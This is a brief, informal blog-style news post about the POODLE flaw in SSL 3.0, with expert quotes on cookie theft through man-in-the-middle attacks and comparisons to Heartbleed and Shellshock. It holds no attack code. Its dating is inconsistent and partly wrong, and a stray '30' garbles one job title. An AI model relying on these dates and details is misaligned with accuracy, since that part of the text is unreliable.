The world is getting more and more unsafe it seems. Google security engineers have uncovered a major vulnerability dubbed Poodle in Web encryption standard SSL 3.0 last November. The bug makes browsers susceptible to hacking, but researchers state that it is not as harmful as Heartbleed or Shellshock bugs. What? You haven’t heard of either of them? Seriously? Do some homework then.
Google security engineers Bodo Möller, Krzysztof Kotowicz and Thai Duong stated in a report that POODLE is a new security hole in Secure Socket Layer (SSL) 3.0 that makes the 15-year-old protocol impossible to use safely and upgrading it will be difficult. “Poodle” stands for Padding Oracle On Downloaded Legacy Encryption. Didn’t get it? Me neither.
Security experts stated that the bug could allow hackers to steal browser “cookies,” but, relax it is not that very serious. Ivan Ristic, director of application 30 security research with Qualys and an expert in SSL stated, “It’s quite complicated. It requires the attacker to have a privileged position in the network.”
Jeff Moss, founder of the Def Con hacking conference and an advisor to the U.S. Department of Homeland Security, stated that hackers could exploit the bug to steal session cookies in browsers, social networks, taking control of accounts for email providers and banks that use that technology. However, they would need to launch a “man-in-the-middle” attack. A common approach used by hackers is to create a rogue WiFi “hot spot” in an Internet cafe, he added.
Moss advised businesses and computer users to stop SSL 3.0 technology on their servers and browsers. “It’s not going to take out the infrastructure of the Internet. But it’s going to be a hassle to fix,” he said. Rumors that a new bug in Open SSL software had been circulating on Twitter and technology news sites in November. Last year, researchers discovered the “Heartbleed” bug in Open SSL, which affected nearly two thirds of all websites and thousands of other technology products. The bug dubbed “Shellshock”, however, was uncovered in a piece of Unix software known as Bash last month.